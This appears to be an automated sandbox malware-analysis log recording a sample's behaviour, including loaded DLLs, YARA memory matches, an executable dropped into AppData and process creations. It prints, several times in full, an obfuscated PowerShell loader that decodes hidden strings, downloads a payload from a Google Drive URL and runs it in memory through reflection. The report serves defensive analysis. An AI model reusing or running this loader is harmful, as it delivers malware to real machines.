Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3049164389.000000000704D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: stem.Core.pdb source: powershell.exe, 00000005.00000002.3049164389.0000000006FA9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vind", "0")
Source: Yara match File source: 00000005.00000002.3057467096.0000000009F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3056701550.00000000083B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3043556156.0000000005624000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Aabningsdag)$global:Vandrende = [System.Text.Encoding]::ASCII.GetString($Rabban)$global:Bondable=$Vandrende.substring($Woodlike,$Bullwhack)<#Elsdyrhoved Smatterer Lsningsalternativet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Upassende $Fichuer $Reexpel), (Omkredsen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blennorrhea = [AppDomain]::CurrentDomain.GetAssemblies()$global:Wh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sammenlgning)), $Detaljerer).DefineDynamicModule($Duad, $false).DefineType($Drearing, $Bibeloversttelse, [System.MulticastDelegate])$D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Aabningsdag)$global:Vandrende = [System.Text.Encoding]::ASCII.GetString($Rabban)$global:Bondable=$Vandrende.substring($Woodlike,$Bullwhack)<#Elsdyrhoved Smatterer Lsningsalternativet
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts Jump to behavior
Source: 31437F.exe.7.dr Static PE information: section name: .didat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D951F2 pushad ; iretd 2_2_00007FF848D952A9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848D900BD pushad ; iretd 2_2_00007FF848D900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848E65846 pushad ; ret 2_2_00007FF848E658E9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BBF5D7 push cs; iretd 7_3_00BBF5D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC49D3 push 00000078h; retf 7_3_00BC49D5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BBFB3F push ds; retf 7_3_00BBFB40
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 7_3_00BC1B43 push eax; iretd 7_3_00BC1B44
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\188E93\31437F.exe Jump to dropped file
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
